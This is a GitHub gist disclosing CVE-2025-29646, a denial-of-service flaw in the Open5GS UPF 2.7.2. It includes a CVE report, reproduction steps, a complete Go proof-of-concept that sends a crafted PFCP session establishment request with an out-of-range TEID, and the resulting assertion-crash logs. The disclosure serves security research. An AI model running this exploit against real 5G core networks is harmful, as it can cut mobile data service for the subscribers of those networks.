Skip to content

Instantly share code, notes, and snippets.

@scmdcs

scmdcs/CVE-2025-29646

Created June 14, 2025 11:07
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save scmdcs/581fa485f957239ea5551daa173d0189 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save scmdcs/581fa485f957239ea5551daa173d0189 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-29646
Raw
CVE-2025-29646
[CVE ID]
CVE-2025-29646
------------------------------------------
[Description]
An issue in upf in open5gs 2.7.2 and earlier allows a remote attacker
to cause a Denial of Service via a crafted PFCP
SessionEstablishmentRequest packet with restoration indication = true
and (teid = 0 or teid >= ogs_pfcp_pdr_teid_pool.size).
------------------------------------------
[Vulnerability Type]
Other - CWE-404
------------------------------------------
[Vendor of Product]
open5gs
------------------------------------------
[Affected Product Code Base]
open5gs - 2.7.2
------------------------------------------
[Affected Component]
upf, open5gs-upfd
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Denial of Service]
true
------------------------------------------
[Attack Vectors]
the attacker must be able to send a crafted pfcp packet to the upf
------------------------------------------
[Reference]
https://github.com/open5gs/open5gs/issues/3747
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Leonardo Sagratella, Lorenzo Cannella, Francesco D'Alterio
Raw
writeup.md

CVE-2025-29646

Vulnerable products

Open5GS UPF v2.7.2

Steps to reproduce

Sending a pfcp NewSessionEstablishmentRequest packet with restoration_indication = true and (teid = 0 or teid > ogs_pfcp_pdr_teid_pool.size) would cause the UPF to reach an assertion in line 1365 of lib/pfcp/context.c and crash. The size of ogs_pfcp_pdr_teid_pool is max_ue * 4 * 16. The issue can be reproduced by starting the upf only.

  1. start a new go project inside a new folder: go mod init ogs_poc
  2. create a main.go and paste the code below:
  3. download required libraries: go mod tidy
  4. run the program with the upf pfcp server address: go run main.go 10.22.77.2
package main
import (
	"flag"
	"fmt"
	"github.com/wmnsk/go-pfcp/ie"
	"github.com/wmnsk/go-pfcp/message"
	"log"
	"net"
)

func execPayload(host string) error {
	// random ip used as node id address
	var addr = "1.1.1.1"
	addrIp := net.ParseIP(addr)

	// create udp connection to upf
	conn, err := net.Dial("udp", host)
	if err != nil {
		return fmt.Errorf("net.Dial: %v", err)
	}
	defer conn.Close()

	// create NewAssociationSetupRequest
	asReq, _ := message.NewAssociationSetupRequest(
		0, ie.NewNodeID(addr, "", ""),
	).Marshal()

	// create NewSessionEstablishmentRequest
	seReq, _ := message.NewSessionEstablishmentRequest(0, 0, 0x0, 1, 0,
		ie.NewNodeID(addr, "", ""),
		ie.NewFSEID(0x0, addrIp, nil),
		ie.NewCreatePDR(
			ie.NewPDRID(0),
			ie.NewPDI(
				ie.NewSourceInterface(0),
				// (teid = 0 or teid = max_ue*4*16) and pfcpSEReq = 1
				ie.NewFTEID(1, 1024*4*16+1, addrIp, nil, 0),
			)),
		// pfcpSEReq = 1 -> Restoration Indication = Present
		ie.NewPFCPSEReqFlags(1),
	).Marshal()

	// send association setup
	conn.Write(asReq)
	fmt.Printf("sent NewAssociationSetupRequest 0x%x\n", asReq)

	// send session establishment with payload
	conn.Write(seReq)
	fmt.Printf("sent NewSessionEstablishmentRequest 0x%x\n", seReq)

	return nil
}

func main() {

	var (
		port = flag.Int("p", 8805, "upf pfcp port")
	)
	flag.Parse()
	if len(flag.Args()) != 1 {
		log.Fatal("set pfcp upf host")
	}
	host := fmt.Sprintf("%v:%d", flag.Arg(0), *port)

	err := execPayload(host)
	if err != nil {
		log.Fatalf("execPayload: %v", err)
	}
}

Logs

Open5GS daemon v2.7.2

02/27 21:58:05.778: [app] INFO: Configuration: '/etc/open5gs/custom/upf.yaml' (../lib/app/ogs-init.c:144)
02/27 21:58:05.778: [app] INFO: File Logging: '/var/log/open5gs/upf.log' (../lib/app/ogs-init.c:147)
02/27 21:58:05.808: [pfcp] INFO: pfcp_server() [10.22.77.2]:8805 (../lib/pfcp/path.c:30)
02/27 21:58:05.808: [gtp] INFO: gtp_server() [10.66.55.2]:2152 (../lib/gtp/path.c:30)
02/27 21:58:05.808: [app] INFO: UPF initialize...done (../src/upf/app.c:31)
02/27 22:07:49.085: [upf] INFO: PFCP associated [1.1.1.1]:8805 [10.22.77.1]:42441 (../src/upf/pfcp-sm.c:168)
02/27 22:07:49.085: [upf] INFO: [Added] Number of UPF-Sessions is now 1 (../src/upf/context.c:209)
02/27 22:07:49.085: [pfcp] FATAL: ogs_pfcp_pdr_swap_teid: Assertion `pdr->f_teid.teid > 0 && pdr->f_teid.teid <= ogs_pfcp_pdr_teid_pool.size' failed. (../lib/pfcp/context.c:1365)
02/27 22:07:49.085: [core] FATAL: backtrace() returned 11 addresses (../lib/core/ogs-abort.c:37)
/usr/local/lib/libogspfcp.so.2(ogs_pfcp_pdr_swap_teid+0x181) [0x7c2429965355]
open5gs-upfd(+0x17837) [0x59f991074837]
open5gs-upfd(+0x102e5) [0x59f99106d2e5]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7c24299f9385]
open5gs-upfd(+0xeaf8) [0x59f99106baf8]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7c24299f9385]
open5gs-upfd(+0x7952) [0x59f991064952]
/usr/local/lib/libogscore.so.2(+0x119a3) [0x7c24299e99a3]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7c24293ebac3]
/lib/x86_64-linux-gnu/libc.so.6(+0x126850) [0x7c242947d850]
/usr/local/bin/entrypoint.sh: line 14:    24 Aborted                 (core dumped) open5gs-upfd "${@}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment